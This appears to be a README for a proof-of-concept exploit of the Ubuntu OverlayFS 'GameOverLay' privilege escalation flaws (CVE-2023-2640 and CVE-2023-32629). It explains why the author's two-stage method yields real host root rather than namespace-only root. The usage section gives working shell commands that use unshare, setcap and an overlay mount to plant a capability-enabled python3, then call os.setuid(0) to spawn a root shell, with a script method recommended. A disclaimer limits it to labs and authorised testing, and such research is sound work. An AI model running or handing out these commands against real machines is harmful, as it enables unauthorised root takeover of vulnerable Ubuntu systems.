## https://sploitus.com/exploit?id=763E086B-B0C5-52EA-B5E2-3E3F15B422B0
# CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - Real Host Root Escape PoC
An interactive, multi-step Local Privilege Escalation (LPE) Proof of Concept (PoC) targeting the Ubuntu Linux kernel OverlayFS vulnerabilities (**CVE-2023-2640** / **CVE-2023-32629**).
Unlike standard automated one-liners that trap your interactive shell inside a restrictive **User Namespace (Fake Root)**, this methodology splits the exploit sequence to safely drop a **true, unrestricted host root shell**.
---
## The "Fake Root" Problem Explained
Many public exploits string the setup and execution together using a single automated shell sequence like this:
`unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"`
Because the Python execution payload is embedded inside the `unshare` double quotes, it executes **internally** within the user namespace sandbox.
* **The Result:** Your user ID reads as `uid=0(root)`, but your shell is cryptographically isolated from the host. If you try to view the host root directory (`cd /root`), you will hit a `Permission Denied` error.
### The Fix
This PoC splits the process into two distinct logical stages:
1. **Weaponize inside the Sandbox:** Run `unshare` to fake root permissions *just* long enough to exploit the OverlayFS `ovl_copy_up` flaw, leaking a high-privilege `setcap cap_setuid+eip` capability into a local Python binary folder.
2. **Execute outside the Sandbox:** The namespace automatically closes. The backdoored binary is then executed directly from the **real host context** as a normal unprivileged user. The kernel reads the leaked flag, allows `os.setuid(0)`, and hands you true host-level system administration privileges.
---
## Vulnerability Details
* **CVE-2023-2640**: Ubuntu Kernel OverlayFS incorrect restriction of file capabilities within user namespaces.
* **CVE-2023-32629**: Flaw in Ubuntu Kernel's `ovl_copy_up_meta_inode_data` function allowing validation checks to be entirely bypassed during file migration.
* **Affected Systems**: Ubuntu 22.04 LTS running Linux Kernel releases below `6.2.0-26-generic`.
---
## Usage Instructions
### Method 1: The Automated Script (Recommended)
1. Clone or download `exploit.sh` to the target machine (e.g., inside `/tmp`).
2. Give it execution permissions and run it:
```bash
chmod +x exploit.sh
./exploit.sh
```
### Method 2: Manual Line-by-Line Interactive Execution
If you are working over a volatile reverse shell, run these commands completely separately, pressing `Enter` after each line:
```bash
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m
# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
Verify your true privileges by checking your current user profile:
```bash
whoami
cat /root/root.txt
```
---
## Credits & Acknowledgments
The baseline exploit mechanics used in this interactive refactor were originally discovered and documented by security researchers **Liav Eliyahu** and **g1vi**.
## Disclaimer
This repository is created strictly for educational, security research, and authorized penetration testing purposes (such as HackTheBox / OffSec labs). The author assumes no liability for misuse, unauthorized access attempts, or infrastructure damage caused by this materials. Use responsibly.